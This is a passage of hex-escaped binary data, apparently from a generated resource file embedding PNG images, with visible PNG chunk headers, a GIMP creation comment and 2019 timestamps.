a\\xe0\\xdf\\xad\\x5b\\x75\\x3f\\x2f\\x2f\\xa0\\xee\\xdc\\x2d\\x29\\xe9\\\n\\xe7\\x22\\x4f\\x96\\x7b\\x45\\xe7\\xce\\x8e\\x81\\x8e\\x81\\x8e\\x81\\xdf\\x7f\\\n\\x2f\\x7b\\x7b\\xdc\\x8d\\x12\\xac\\x92\\x4a\\x9b\\x37\\x53\\x89\\x5f\\x57\\x63\\\n\\xeb\\x36\\x6d\\x78\\x0f\\xef\\xa6\\x87\\xaa\\xf1\\x0e\\x42\\x21\\xe2\\x18\\x7d\\\n\\x80\\x73\\x01\\xde\\x42\\x00\\x78\\x49\\x04\\xd3\\x65\\x4a\\x6b\\xd0\\xa0\\xaa\\\n\\x9f\\xa7\\xfc\\x43\\x33\\x37\\x6f\\x8a\\xdf\\xf1\\xdf\\x44\\xcf\\xd1\\xa3\\x95\\\n\\x81\\xce\\xd5\\xce\\xd5\\x13\\x27\\xe6\\x25\\xe4\\x25\\xe4\\x25\\x54\\xc1\\xd9\\\n\\xfd\\x2a\\x62\\x4f\\xb5\\xa7\\xda\\x53\\x2f\\x5d\\x52\\x9a\\xe5\\xb6\\x52\\xcf\\\n\\xf6\\xe8\\xc1\\x7f\\xe7\\x48\\x8a\\x9b\\x39\\x93\\x33\\xf9\\x73\\x4e\\x2f\\x2d\\\n\\xad\\xb2\\x27\\xfe\\x88\\x16\\xf0\\xed\\xfc\\x7c\\xd9\\xfd\\x6b\\x05\\x02\\xc0\\\n\\x4b\\xfc\\x24\\x11\\x4d\\xf0\\xe1\\xf7\\xc8\\xff\\x5a\\xc5\\x1d\\x76\\xba\\x88\\\n\\x89\\x62\\x62\\x87\\x0e\\x39\\xd9\\xb9\\x7f\\x75\\x24\\xad\\x5f\\x2f\\xbb\\x6f\\\n\\xdf\\xf0\\x78\\x94\\xa8\\xdc\\xb5\\xea\\x8c\\x79\\xf3\\x0c\\x1f\\x8b\\x37\\x69\\\n\\x56\\xe7\\xce\\x9c\\x46\\x56\\x1a\\x7c\\xee\\x9c\\xaf\\x9f\\x89\\x3b\\xf0\\x4a\\\n\\x5e\\x59\\xf1\\x1d\\x90\\xf0\\x5b\\x10\\x00\\x5e\\x32\\xbe\\x24\\x5c\\x14\\xb0\\\n\\x75\\x6b\\xc5\\xb7\\xc2\\xfa\\x6c\\xe0\\xb7\\x78\\x0b\\xf5\\x59\\xbd\\xba\\x24\\\n\\xae\\xb4\\x7e\\x69\\xfd\\x4e\\x9d\\xca\\x4f\\xe6\\x9d\\x3f\\x2f\\xbb\\xdf\\xaa\\\n\\x92\\x33\\xc5\\xb9\\xc9\\xb9\\xe9\\xd4\\xa9\\xd2\\xe5\\xee\\x3f\\xdf\\xe6\\xf6\\\n\\xed\\x39\\x95\\x9e\\xe4\\x27\\x96\\x2e\\xad\\xf4\\x76\\x6d\\xc5\\x47\\xe8\\xa9\\\n\\x1d\\x3b\\x94\\xa8\\xdc\\xb5\\xb9\\x6b\\xbf\\xfe\\x5a\\x76\\x9f\\x5a\\x81\\x00\\\n\\xf0\\xd2\\xc5\\x14\\x95\\x54\\x3a\\x7d\\xba\\xe2\\x7b\\xe0\\x1f\\x74\\x1c\\x9e\\\n\\x4d\\x23\\x29\\xe6\\xa7\\x9f\\x28\\x5f\\x74\\xa2\\x8e\\xe3\\xc6\\xd9\\x47\\xe6\\\n\\x76\\x52\\x13\\xa3\\xa3\\x0b\\x62\\x0a\\x62\\x0a\\x62\\x4a\\x4a\\x64\\xf7\\x59\\\n\\x5d\\x2a\\xde\\xd2\\x28\\xad\\x9c\\x9b\\x9c\\x9b\\x26\\x4f\\xa6\\x3e\\xe2\\x10\\\n\\x1d\\x8c\\x8a\\xe2\\x78\\x6a\\x43\\xfd\\x2e\\x5f\\xf6\\x7a\\xa0\\x27\\x88\\x69\\\n\\xd2\\x9e\\x3d\\x75\\x47\\xdd\\x7a\\xb9\\x5e\\xff\\x31\\x63\\x64\\xf7\\xa5\\x35\\\n\\x7e\\xb2\\x0b\\xd0\\x1a\\x65\\x5d\\x6e\\xa0\\x3a\\x72\\xca\\x14\\x5b\\xa2\\xd9\\\n\\x66\\xb1\\x33\\x8b\\xed\\xd4\\x98\\x26\\xc4\\xc6\\xde\\x59\\xa0\\x72\\x37\\xef\\\n\\xf0\\x74\\xde\\x7b\\xfc\\xb8\\xa1\\x90\\x0a\\x79\\xdd\\xf8\\xf1\\x39\\x2e\\xe7\\\n\\x96\\xdc\\x2d\\xbe\\x9f\\x02\\x6b\\x95\\x7d\\xba\\x4a\\x2a\\xa5\\xa5\\xb5\\x48\\\n\\x09\\x0a\\x68\\x11\\xd9\\xac\\x99\\x6b\\x46\\x40\\x4e\\x89\\x63\\xc2\\x04\\x32\\\n\\x19\\xbe\\xe3\\xf7\\xba\\x77\\x17\\x57\\xe9\\x02\\x5d\\x68\\xd0\\x80\\xff\\x49\\\n\\x07\\xe8\\x80\\xd3\\xc9\\x36\\xfe\\xc1\\xd0\\x3b\\x39\\xd9\\x31\\x30\\x77\\x87\\\n\\x63\\xe0\\xee\\xdd\\xb4\\x9e\\x72\\x71\\xdd\\xff\\xfe\\x61\\x21\\x50\\x25\\xd9\\\n\\x6c\\x8d\\xa7\\xdb\\x6c\\xad\\x5b\\x8b\\x65\\xc6\\x67\\xdd\\xab\\x86\\x0c\\xe1\\\n\\x87\\xe9\\x22\\x5d\\xb4\\x5a\\x0d\\x3d\\x78\\xbf\\xf8\\x24\\x3f\\xdf\\xb3\\x58\\\n\\x9c\\xe0\\xfc\\xaf\\xbe\\x52\\x26\\x39\\x15\\xa7\\xb2\\x77\\x6f\\xf9\\xa3\\xaa\\\n\\x6e\\x47\\x0d\\x0f\\x37\\x99\\xac\\xd6\\xa1\\x43\\xab\\x7a\\x21\\x50\\xd5\\x6f\\\n\\x59\\xa8\\x0e\\x98\\x01\\x54\\x92\\xa2\\xe4\\x25\\x28\\x4a\\x56\\x16\\xf5\\xa1\\\n\\x04\\x8a\\xcc\\xca\\xfa\\x9f\\x3f\\x98\\x24\\xbb\\x42\\x80\\xbb\\xc3\\x39\\x00\\\n\\x00\\x1d\\x43\\x00\\x00\\xe8\\x18\\x02\\x00\\x40\\xc7\\x10\\x00\\x00\\x3a\\x86\\\n\\x00\\x00\\xd0\\x31\\x04\\x00\\x80\\x8e\\x21\\x00\\x00\\x74\\x0c\\x01\\x00\\xa0\\\n\\x63\\x08\\x00\\x00\\x1d\\x43\\x00\\x00\\xe8\\x18\\x02\\x00\\x40\\xc7\\x10\\x00\\\n\\x00\\x3a\\x86\\x00\\x00\\xd0\\x31\\x04\\x00\\x80\\x8e\\x21\\x00\\x00\\x74\\x0c\\\n\\x01\\x00\\xa0\\x63\\x08\\x00\\x00\\x1d\\x43\\x00\\x00\\xe8\\x18\\x02\\x00\\x40\\\n\\xc7\\x10\\x00\\x00\\x3a\\x86\\x00\\x00\\xd0\\x31\\x04\\x00\\x80\\x8e\\x21\\x00\\\n\\x00\\x74\\x0c\\x01\\x00\\xa0\\x63\\x08\\x00\\x00\\x1d\\x43\\x00\\x00\\xe8\\x18\\\n\\x02\\x00\\x40\\xc7\\x10\\x00\\x00\\x3a\\x86\\x00\\x00\\xd0\\x31\\x04\\x00\\x80\\\n\\x8e\\x21\\x00\\x6a\\x19\\xf7\\x31\\xda\\xe7\\xde\\xeb\\xf1\\x68\\x65\\x5c\\x90\\\n\\x0b\\x01\\x50\\xcb\\xf8\\x75\\x31\\xb6\\x33\\xb6\\xbb\\x7a\\xd5\\xd7\\xe3\\x8a\\\n\\x0e\\x5c\\xc7\\x2f\\xaa\\xb0\\x50\\x76\\x7f\\xe0\\x5b\\x08\\x80\\x5a\\xe6\\x56\\\n\\xdf\\xb2\\xd8\\xb2\\xd8\\x13\\x27\\xf8\\x08\\x27\\x70\\xd2\\x8d\\x1b\\x95\\x1e\\\n\\xf0\\x2a\\xef\\xe0\\x03\\xd7\\xaf\\x7b\\x14\\xa3\\xcd\\xa3\\x9c\\x3c\\x29\\xbb\\\n\\x3f\\xf0\\x2d\\x04\\x40\\x2d\\x93\\x97\\x90\\x97\\x90\\x97\\x70\\xeb\\x16\\xfd\\\n\\x40\\x0f\\x89\\x80\\xf9\\xf3\\x2b\\x3d\\xe0\\x2a\\xb1\\x95\\x92\\xde\\x7f\\x5f\\\n\\x25\\x95\\x54\\x72\\xb9\\x64\\xf7\\x07\\xbe\\x25\\x64\\x17\\x00\\x55\\xc9\\x68\\\n\\x0c\\x7b\\xd5\\x74\\xde\\x32\\x61\\xdd\\x3a\\x4a\\x11\\x4f\\xd3\\x3f\\x86\\x0f\\\n\\xf7\\xfa\\xa1\\x87\\x29\\x84\\x36\\x6f\\xd8\\x60\\x0f\\x71\\x1e\\x55\\x3b\\x8f\\\n\\x1d\\x5b\\xfe\\x43\\xb7\\x5b\\x76\\x47\\xe0\\x5b\\x08\\x00\\x5d\\x10\\xc2\\x66\\\n\\x33\\x47\\x99\\xa3\\x86\\x0f\\xa7\\xf7\\x79\\xbc\\xd8\\x13\\x13\\x43\\x21\\xa2\\\n\\x98\\x57\\x46\\x44\\x50\\x53\\xfe\\x03\\x59\\x99\\xa9\\x98\\x9a\\x89\\xa9\\x19\\\n\\x19\\xf4\\xa8\\xa1\\x15\\x9d\\x5d\\xb1\\x42\\x09\\x56\\x49\\xa5\\xe4\\xe4\\xf2\\\n\\xc7\\x33\\xcb\\xee\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x40\\x2f\\xfe\\x0d\\xba\\x9f\\xf7\\x46\\x33\\x2d\\xbe\\x53\\\n\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\\n\\x61\\x74\\x65\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\x31\\\n\\x30\\x3a\\x31\\x36\\x3a\\x34\\x30\\x2b\\x30\\x33\\x3a\\x30\\x30\\x63\\xbf\\x7d\\\n\\x3a\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\\n\\x64\\x69\\x66\\x79\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\\n\\x31\\x30\\x3a\\x31\\x36\\x3a\\x34\\x31\\x2b\\x30\\x33\\x3a\\x30\\x30\\xb4\\x95\\\n\\xce\\x32\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x23\\x85\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\xe1\\x00\\x00\\x00\\xe1\\x08\\x06\\x00\\x00\\x00\\x3e\\xb3\\xd2\\x7a\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x2e\\x23\\x00\\x00\\\n\\x2e\\x23\\x01\\x78\\xa5\\x3f\\x76\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe3\\x07\\x13\\x10\\x39\\x21\\xf2\\x43\\xd9\\x79\\x00\\x00\\x00\\x19\\x74\\x45\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\\n\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x57\\x81\\x0e\\x17\\x00\\\n\\x00\\x20\\x00\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x9d\\x7f\\x58\\x54\\x65\\xfe\\\n\\xf7\\xdf\\xe7\\x1c\\x86\\x19\\x06\\xd4\\xd0\\xb1\\x92\\x45\\xd6\\xb5\\xc4\\x4c\\\n\\xfc\\x85\\xe6\\x8a\\x42\\x50\\xb3\\x11\\x45\\x6a\\x82\\xb6\\x6e\\x7d\\x49\\x6d\\\n\\xe5\\x69\\xcb\\xbd\\x50\\x13\\x91\\xc7\\x07\\x1e\\xf1\\x82\\xaf\\x8f\\x21\\x0a\\\n\\x72\\x7d\\xb3\\xef\\x3e\\xb8\\x99\\xf1\\xad\\xb5\\x55\\x68\\xa5\\xa5\\x8c\\x9c\\\n\\x42\\x40\\x31\\xd7\\xc0\\x1f\\x94\\x45\\xe5\\xfa\\x35\\xa2\\x36\\x79\\xd4\\x34\\\n\\x71\\x60\\x98\\x39\\xcf\\x1f\\x33\\x83\\xfc\\x12\\x66\\xe0\\xdc\\xe7\\xdc\\x67\\\n\\xe6\\x7e\\x5f\\x17\\x57\\x65\\x78\\xce\\xb9\\xef\\x73\\xbf\\xce\\xe7\\xfe\\xf1\\\n\\xbe\\x3f\\x37\\x27\\x8a\\x22\\x98\\x98\\x98\\x94\\x13\\xcf\\xaa\\x80\\x89\\x89\\\n\\x41\\xc8\\xc4\\xc4\\x20\\x64\\x62\\x62\\x62\\x10\\x32\\x31\\x31\\x08\\x99\\x98\\\n\\x98\\x18\\x84\\x4c\\x4c\\x0c\\x42\\x26\\x26\\x26\\x06\\x21\\x13\\x13\\x83\\x90\\\n\\x89\\x89\\x89\\x41\\xc8\\xc4\\xe4\\x55\\xf2\\x91\\xfa\\x82\\xc5\\xc5\\xc5\\x58\\\n\\x76\\x36\\x48\\xb1\\x02\\x4d\\x38\\xf8\\x22\\x32\\x32\\x32\\x90\\x94\\x94\\x44\\\n\\xf4\\x3e\\x2b\\x57\\xae\\x44\\xee\\xd5\\xcf\\xf0\\xcc\\xc9\\x8b\\xb2\\x97\\x71\\\n\\xfd\\x3d\\xa3\\xf0\\xef\\x18\\x8d\\xe4\\xe4\\x64\\x2c\\x5d\\xba\\x94\\xb5\\x62\\\n\\x95\\x8b\\x93\\xda\\x3b\\x3a\\x75\\xea\\x54\\x34\\xc4\\xe5\\x2b\\x5e\\xb0\\x45\\\n\\xdf\\xec\\x42\\x49\\x49\\x09\\xd1\\x7b\\x44\\x46\\x46\\xa2\\xec\\x6e\\xab\\xa2\\\n\\xe5\\x5c\\xf0\\x83\\x80\\xc3\\x87\\x0f\\x43\\xa7\\xd3\\xb1\\xd6\\xcc\\xba\\xa3\\\n\\x76\\xb5\\xb5\\xb5\\x51\\x51\\xb0\\x77\\xee\\x79\\x11\\xb3\\x66\\xcd\\x82\\xd5\\\n\\x4a\\x0e\\x92\\x23\\x47\\x8e\\x20\\xa6\\xf1\\x86\\xa2\\xe5\\x2c\\xbb\\xdb\\x8a\\\n\\x69\\xd3\\xa6\\x11\\x2d\\x27\\x93\\xca\\x20\\xac\\xaf\\xaf\\x47\\xf0\\xbe\\x15\\\n\\x54\\x14\\xae\\xee\\xe1\\x97\\x11\\x1d\\x1d\\x4d\\xec\\xfa\\x82\\x20\\xe0\\xc4\\\n\\x89\\x13\\x8a\\x97\\xb3\\x76\\xca\\x48\\xc4\\xc6\\xc6\\xb2\\xd6\\xcc\\x20\\xb4\\\n\\x4b\\xaf\\xd7\\xa3\\xae\\xae\\x8e\\x9a\\x02\\x1e\\x9b\\xbb\\x19\\x0b\\x16\\x2c\\\n\\x20\\x76\\x7d\\x9d\\x4e\\x07\\xdb\\x7f\\xbe\\xab\\x78\\x39\\xf7\\x07\\xb6\\x12\\\n\\x1f\\x07\\x33\\xa9\\x04\\x42\\x00\\x30\\x18\\x0c\\xb8\\x98\\x32\\x91\\x9a\\x42\\\n\\xfe\\xfd\\xbe\\xd5\\x44\\x1b\\xa8\\xc1\\x60\\x40\\x6b\\xc1\\x7e\\xc5\\xcb\\xb9\\\n\\xf3\\xe6\\xd7\\x48\\x49\\x49\\x61\\xad\\x9a\\x41\\x68\\x57\\x70\\x70\\x30\\xce\\\n\\x3c\\x7b\\x17\\x35\\x05\\x7d\\x73\\xcc\\x72\\xa4\\xa6\\xa6\\x82\\x64\\x79\\x9b\\\n\\xb3\\x8a\\x14\\x2f\\x67\\x56\\xf3\\x3f\\x90\\x9b\\x9b\\xcb\\x5a\\x36\\x83\\xd0\\\n\\xae\\xb0\\xb0\\x30\\x54\\x2d\\xd0\\x52\\x53\\xd8\\x1d\\xfc\\x63\\xc8\\xc9\\xc9\\\n\\x21\\x5a\\xde\\x2f\\xd7\\xed\\x50\\xbc\\x9c\\x2b\\x4f\\xbc\\x83\\xa2\\xa2\\x22\\\n\\xd6\\xba\\x55\\x22\\x21\\x2b\\x2b\\x8b\\xe8\\x0d\\x42\\x42\\x42\\x30\\xe5\\xfa\\\n\\x29\\xfc\\xb5\\x89\\x8e\\x29\\xf4\\x8f\\xdb\\xc6\\x22\\xe8\\x82\\x09\\x33\\x67\\\n\\xce\\x24\\x72\\xfd\\xb1\\x63\\xc7\\xe2\\x7d\\x9f\\x91\\x18\\x77\\xf6\\x98\\xa2\\\n\\xe5\\xbc\\xff\\x9b\\x7a\\x7c\\xe4\\x3f\\x06\\xa1\\xa1\\xa1\\xac\\x95\\x53\\x2e\\\n\\xb7\\xd6\\x09\\x35\\x69\\x26\\x81\\x03\\xd0\\x9e\\x6b\\x74\\x7b\\x3e\\xbc\\xa8\\\n\\xa8\\x08\\xcf\\x7f\\x35\\x9e\\x9a\\x82\\xbf\\x15\\x7e\\x89\\xe8\\x42\\xf7\\x9e\\\n\\x3d\\x7b\\xb0\\xb0\\xfc\\xff\\x2a\\x5e\\xce\\xcf\\xd7\\x6c\\x43\\x64\\x64\\x24\\\n\\x6b\\xe9\\x84\\xa5\\x49\\x33\\x09\\x36\\x47\\xcf\\x52\\x00\\x6c\\xee\\x30\\xe2\\\n\\x32\\x84\\x9a\\x34\\x93\\x60\\x05\\xe6\\x02\\x10\\x78\\xe0\\x68\\x47\\xae\\xd1\\\n\\xe2\\xee\\x83\\x66\\x67\\x67\\x63\\xd3\\xf5\\xb9\\xd4\\x54\\xdc\\x87\\x8f\\x02\\\n\\x46\\xa3\\x91\\xd8\\xf5\\xb7\\x6f\\xdf\\x8e\\x15\\xb5\\x07\\x14\\x2f\\x67\\x73\\\n\\x56\\x11\\xc2\\xc2\\xc2\\x18\\x29\\x04\\xa4\\x4d\\x33\\x09\\x1d\\x80\\x46\\xb4\\\n\\xb3\\x31\\xcf\\xf1\\xc7\\xd5\\x1a\\xa0\\xba\\xcd\\x45\\x10\\x5d\\x1e\\x13\\x8a\\\n\\xf6\\xdf\\x8d\\x02\\xb0\\xde\\x06\\xc4\\xf8\\xa4\\x99\\x34\\xee\\x3e\\x70\\x66\\\n\\x66\\x26\\xfe\\x68\\x3e\\x48\\x4d\\x05\\x3e\\xf2\\x01\\x88\\x2e\\xa7\\xac\\x5b\\\n\\xb7\\x0e\\x5b\\xc6\\xcd\\x53\\xbc\\x9c\\x41\\x59\\xc9\\x68\\x6a\\x6a\\x62\\xc4\\\n\\x48\\x2c\\x9f\\x34\\x93\\xc6\\x02\\x44\\x8b\\x40\\x3a\\x80\\xff\\x05\\x60\\x23\\\n\\x80\\x0d\\x00\\xa2\\xac\\x6e\\xb0\\xe5\\xee\\xc4\\x8c\\x06\\x40\\xf4\\x50\\x40\\\n\\x2c\\x2c\\x2c\\xc4\\xa2\\x6f\\x76\\x51\\x53\\x91\\xb3\\xf6\\x5d\\x41\\x63\\x63\\\n\\x23\\xb1\\xeb\\xe7\\xe5\\xe5\\x21\\xed\\x8e\\xc9\\x8a\\x97\\x53\\xbf\\x66\\x09\\\n\\x5a\\x5a\\x5a\\x18\\x39\\x12\\x02\\x68\\x03\\x62\\x60\\x07\\x70\\x83\\x83\\x0b\\\n\\x1d\\x00\\x5f\\x7b\\x8f\\xd4\\x75\\xb9\\x0b\\x21\\xe7\\xb8\\x49\\x8c\\x13\\x44\\\n\\x21\\xcd\\xa4\\xd3\\xa6\\x99\\xdc\\xba\\x69\\x49\\x49\\x09\\xe6\\x1e\\xdb\\x44\\\n\\x4d\\x85\\xde\\xb7\\xfb\\x5b\\xa2\\x91\\x62\\xf7\\xee\\xdd\\x78\\xfa\\xe7\\x11\\\n\\x8a\\x97\\x33\\x69\\xd6\\x34\\x98\\xcd\\x66\\x46\\x90\\x74\\x00\\xae\\x77\\xb0\\\n\\xa0\\x73\\x17\\xbc\\xa1\\x40\\xd8\\x35\\x22\\xc6\\x00\\x48\\x17\\x81\\x74\\x0b\\\n\\x10\\xed\\x6e\\x54\\x3c\\x72\\xe4\\x08\\x35\\xf6\\x36\\x00\\x08\\x29\\xfc\\x12\\\n\\x57\\xae\\x5c\\x21\\x76\\xfd\\x43\\x87\\x0e\\x61\\xc1\\x0f\\x82\\xa2\\x65\\x7c\\\n\\x73\\x56\\x08\\x22\\x23\\x23\\x99\\xcf\\x54\\x5a\\x00\\x35\\x43\\xbd\\xe6\\x50\\\n\\xd6\\x09\\x9d\\x5d\\xd3\\x0d\\x00\\xd2\\xdd\\xed\\x9e\\x0a\\x82\\x80\\x86\\x86\\\n\\x06\\xaa\\x2a\\x78\\xd2\\xfd\\x53\\x88\\x46\\x8a\\xc3\\x87\\x0f\\x2b\\xb2\\xf5\\\n\\xa9\\xab\\x2a\\xc6\\x69\\x98\\xcf\\x94\\x22\\x00\\x87\\x0a\\x21\\x1c\\x21\\x58\\\n\\xd7\\xb5\\x7b\\xea\\x0e\\x88\\xc3\\x87\\x0f\\x47\\xd3\\x9a\\x49\\xd4\\x54\\xf2\\\n\\x8f\\x49\\x7b\\x31\\x7b\\xf6\\x6c\\x62\\x91\\x42\\xa7\\xd3\\xe1\\xed\\x33\\xe7\\\n\\x14\\x2f\\x27\\xf3\\x99\\xd2\\x03\\xa0\\x14\\x10\\xf6\\xec\\x9e\\xba\\x0d\\x62\\\n\\x50\\x50\\x10\\xbe\\x58\\x39\\x96\\x9a\\xca\\x6e\\x88\\xcb\\x27\\x1a\\x29\\x86\\\n\\x0f\\x1f\\x0e\\x73\\x61\\x89\\xe2\\xe5\\xdc\\x79\\xf3\\x6b\\xa2\\x36\\x3e\\x06\\\n\\xa0\\xfc\\x10\\x0e\\x09\\xc4\\xd0\\xd0\\x50\\x1c\\x5d\\xa4\\xa7\\xa6\\xd2\\x3f\\\n\\x9e\\xb9\\x91\\x68\\xa4\\x08\\x0a\\x0a\\x42\\xcb\\x96\\xbd\\x8a\\x97\\x73\\xe3\\\n\\x85\\xa3\\xd8\\xbe\\x7d\\x3b\\xa3\\x4c\\x41\\x00\\xa5\\x86\\x70\\x48\\x20\\x46\\\n\\x44\\x44\\xe0\\xdd\\x68\\x7a\\x66\\xee\\xde\\x1c\\xb3\\x9c\\xe8\\x8e\\x84\\xd0\\\n\\xd0\\x50\\x5c\\xd8\\xf8\\x8a\\xe2\\xe5\\x5c\\x51\\x7b\\x00\\xc5\\xc5\\xc5\\x8c\\\n\\x36\\x85\\x00\\x24\\x01\\xe1\\x90\\x40\\x8c\\x8f\\x8f\\xc7\\x9f\\x27\\x5d\\xa4\\\n\\xe6\\x25\\xfc\\x87\\x6e\\x21\\xb2\\xb3\\xb3\\x89\\x5d\\x3f\\x3c\\x3c\\x1c\\xf5\\\n\\x2f\\xe4\\x28\\x5e\\xce\\xf8\\x83\\xbb\\x50\\x5e\\x5e\\xce\\xa8\\x73\\x48\\x9b\\\n\\x66\\x12\\x84\\x34\\x93\\x4e\\x0e\\x00\\x49\\x41\\x38\\x24\\x10\\x57\\xac\\x58\\\n\\x81\\x6d\\x77\\x9d\\xa2\\xe6\\x85\\x6c\\xba\\x3e\\x97\\xe8\\x8e\\x04\\xa3\\xd1\\\n\\x88\\xca\\xa7\\xd7\\x2b\\x5e\\xce\\x88\\x3d\\x39\\xa8\\xad\\xad\\x65\\xd1\\xaf\\\n\\xbb\\x0b\\x26\\x9d\\x34\\x80\\x6e\\x41\\x28\\xca\\x08\\xe2\\xba\\x75\\xeb\\xf0\\\n\\x92\\xed\\x7d\\x6a\\x5e\\xcc\\xf3\\x5f\\x8d\\x47\\x69\\x69\\x29\\xb1\\xeb\\x27\\\n\\x24\\x24\\xa0\\xe4\\xd1\\xe7\\x14\\x2f\\xe7\\xc4\\xed\\x2f\\x11\\x75\\x0f\\xa9\\\n\\xa8\\xfb\\xd9\\xd5\\x05\\xa3\\x21\\x7d\\x5f\\xd2\\x79\\x47\\x07\\x0d\\x62\\x5e\\\n\\x5e\\x1e\\x9e\\xf9\\xfe\\x75\\x6a\\x5e\\xd0\\xe2\\xe3\\x23\\x60\\x32\\x99\\x88\\\n\\x5d\\x3f\\x39\\x39\\x19\\xaf\\x4c\\x7b\\x5c\\xf1\\x72\\x1a\\x36\\x2e\\x43\\x73\\\n\\x73\\x33\\x1b\\xff\\x0d\\xd1\\x05\\x43\\x13\\x84\\xbd\\x40\\xf4\\x4d\\xf9\\x9b\\\n\\xd6\\xf0\\xe4\\x26\\x97\\xee\\x5b\\x5c\\x5c\\x8c\\x87\\x3e\\xdd\\x42\\xcd\\x8b\\\n\\x22\\x6d\\xf8\\xce\\xcc\\xcc\\x44\\x56\\xd0\\x03\\x8a\\x97\\x53\\x97\\x92\\x88\\\n\\x6b\\xd7\\xae\\x79\\x33\\x80\\x1a\\x39\\xef\\x2f\\x57\\x06\\x6e\\x27\\x88\\x1b\\\n\\xb8\\x8e\\xf6\\x15\\x6d\\x1a\\xbf\\x49\\xfa\\x17\\xf6\\xb9\\x94\\x78\\xd8\\x64\\\n\\x32\\x21\\xfc\\xa3\\x0d\\xd4\\xbc\\x30\\xd2\\x86\\xef\\xc2\\xc2\\x42\\xac\\xf6\\\n\\xbb\\x57\\xf1\\x72\\x9e\\x5c\\xe4\\x1d\\xf6\\x36\\xa5\\x01\\x94\\x13\\x42\\x27\\\n\\x88\\xd1\\x56\\xad\\x3e\\xdd\\x3c\\x66\\x52\\xba\\x39\\xc0\\xe0\\x72\\xf7\\xb4\\\n\\xaa\\xaa\\x0a\\xc3\\x3e\\xfb\\x90\\x9a\\x17\\x77\\xdf\\xee\\x6f\\x89\\x76\\xd9\\\n\\x8a\\x8b\\x8b\\xb1\\xe4\\x8a\\xb2\\xeb\\xa6\\xd3\\x03\\xfd\\x89\\xa6\\x8b\\x64\\\n\\x00\\x2a\\x03\\x21\\x00\\xf8\\xd8\\x34\\x7e\\x21\\x56\\x5d\\xc0\\x53\\xe0\\xb8\\\n\\x34\\x57\\xc7\\x89\\x7a\\xbd\\x1e\\x17\\xfe\\x6b\\x03\\x55\\x2f\\x30\\xb8\\xe0\\\n\\x1c\\xd1\\x2e\\x9b\\xc9\\x64\\x42\\xec\\x05\\x8b\\xa2\\x65\\x2c\\xbb\\xdb\\x4a\\\n\\x34\\x5d\\x24\\x03\\x50\\x19\\x08\\x81\\x3e\\xb6\\x43\\xb9\\x02\\x62\\x60\\x60\\\n\\x20\\x55\\x69\\x14\\x01\\xe0\\x81\\x07\\x1e\\x20\\x6a\\xf8\\xae\\xa9\\xa9\\xc1\\\n\\xf4\\x13\\xdf\\x29\\x5a\\xc6\\xd7\\x7d\\x2f\\x61\\xe5\\xca\\x95\\x0c\\x40\\x1a\\\n\\x20\\xe4\\xc8\\x8d\\x13\\x5d\\x06\\x91\\xb6\\x34\\x8a\\x5f\\x2d\\xdc\\x45\\x34\\\n\\x7f\\x8b\\x4e\\xa7\\xc3\\xe9\\xd3\\xa7\\x15\\x2f\\x67\\xee\\xd5\\xcf\\x88\\x9a\\\n\\x16\\xbc\\x19\\x40\\xa5\\x22\\xe1\\x90\\x40\\x0c\\x0b\\x0b\\xc3\\x87\\x8f\\xd2\\\n\\xf3\\x52\\xeb\\x1e\\x7e\\x19\\x89\\x89\\x89\\xc4\\xae\\x1f\\x18\\x18\\x48\\x45\\\n\\x62\\xe1\\x55\\xa7\\xdf\\x43\\x41\\x41\\x81\\x6a\\xe1\\x33\\x3c\\xb9\\x89\\xf7\\\n\\x4d\\xf9\\x9b\\x96\\x36\\x00\\x69\\x80\\x70\\x50\\x20\\x1a\\x8d\\x46\\x1c\\x98\\\n\\xf3\\x13\\x35\\x2f\\xf8\\x9d\\x7b\\x5e\\x24\\xda\\x65\\x0b\\x0e\\x0e\\xa6\\xc2\\\n\\xf0\\xfd\\x6c\\xcd\\xdb\\xd8\\xb7\\x6f\\x9f\\xea\\x00\\xd4\\xbf\\xb0\\xcf\\xa7\\\n\\x4d\\xe3\\x37\\x89\\xeb\\x68\\x5f\\x01\\xfb\\x22\\x3c\\x35\\x00\\xd2\\x02\\xe1\\\n\\xa0\\x40\\x4c\\x48\\x48\\xa0\\xca\\x67\\xfa\\xda\\xc8\\xdf\\x11\\xed\\xb2\\xd1\\\n\\x62\\xf8\\x8e\\x3d\\xb0\\x93\\xa8\\x69\\x81\\x44\\xf7\\xd3\\x1c\\x60\\x88\\x31\\\n\\x8f\\x99\\x94\\x6e\\xd5\\xea\\xd3\\x21\\x93\\x0b\\x46\\x8d\\x10\\x0e\\x0a\\xc4\\\n\\x15\\x2b\\x56\\x60\\xf3\\xb0\\x63\\xd4\\x14\\x60\\xd3\\xf5\\xb9\\x44\\xbb\\x6c\\\n\\xe1\\xe1\\xe1\\xa8\\x5d\\x91\\xa1\\x78\\x39\\x67\\xbc\\x9a\\x41\\xd5\\xa1\\x3f\\\n\\x03\\x8e\\xff\\x38\\x2e\\xcd\\xaa\\x0b\\x78\\xca\\xa6\\xf1\\x0b\\x01\\x81\\x83\\\n\\x71\\x3d\\x09\\xc2\\x41\\x81\\x98\\x99